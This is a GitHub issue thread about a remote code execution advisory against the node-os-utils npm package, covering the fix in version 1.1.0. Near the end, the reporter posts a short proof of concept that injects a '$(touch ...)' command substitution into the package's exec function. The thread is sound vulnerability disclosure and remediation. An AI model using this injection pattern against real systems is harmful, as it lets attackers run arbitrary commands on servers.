SunilWang / node-os-utils

OS Utils - An operating system utility library.
https://www.npmjs.com/package/node-os-utils
MIT License

package is signed as high severity vulnerability from npm #2

Closed. gchiocchio closed this issue 5 years ago.

gchiocchio commented 5 years ago

package is signed as high severity vulnerability from npm

https://nodesecurity.io/advisories/784

Zorono commented 5 years ago

I agree with you...

SunilWang commented 5 years ago

fix done!

https://www.npmjs.com/package/node-os-utils

npm install node-os-utils@1.1.0

rdimascio commented 4 years ago

Seems like this hasn't been fixed yet

https://www.npmjs.com/advisories/784

SunilWang commented 4 years ago

@rdimascio Already modified once; I don't know where the risk would be.

Is it because of calling system commands?

peterkingsbury commented 4 years ago

Could it work to contact the individual who reported the incident? He may have specifics that you can react to. The advisory site https://www.npmjs.com/advisories/784 links his homepage, where there is an email address at which he can be contacted.

Because node-os-utils fails npm audit, and passing npm audit is part of our build pipeline, we can't use it any longer.

SunilWang commented 4 years ago

@peterkingsbury Email sent, waiting for reply. Thanks for the feedback.

SunilWang commented 4 years ago

@peterkingsbury @rdimascio @Zorono @gchiocchio

https://www.npmjs.com/advisories/784

Overview: Versions of node-os-utils prior to 1.1.0 are vulnerable to Remote Code Execution. Due to insufficient input validation an attacker could run arbitrary commands on the server thus rendering the package vulnerable to Remote Code Execution.

Remediation: Upgrade to version 1.1.0 or later

Thank you all. Latest version: 1.2.1

franktip commented 4 years ago

Hello, sorry for the delayed response. The following code snippet demonstrates the vulnerability in the version that I originally examined:

// Reporter's PoC: the untrusted string is built with a "$(...)" command
// substitution, appended to, and handed to node-os-utils' exec, which
// passes it to a shell.
done = function done(){ console.log("Done!"); };
var DUMMY_FILE = './xyzzy';
var command = "$(touch " + DUMMY_FILE + ")";
function dummySource(val){ command += val; }
dummySource(' ');
var nodeosutils = require('node-os-utils');
var exec = nodeosutils.exec;
exec(command)();
done();

Executing this code resulted in the creation of a file "xyzzy" due to the execution of an injected command.

franktip commented 4 years ago

I just tried running this code with the current version of node-os-utils, and the vulnerability appears to have been eliminated.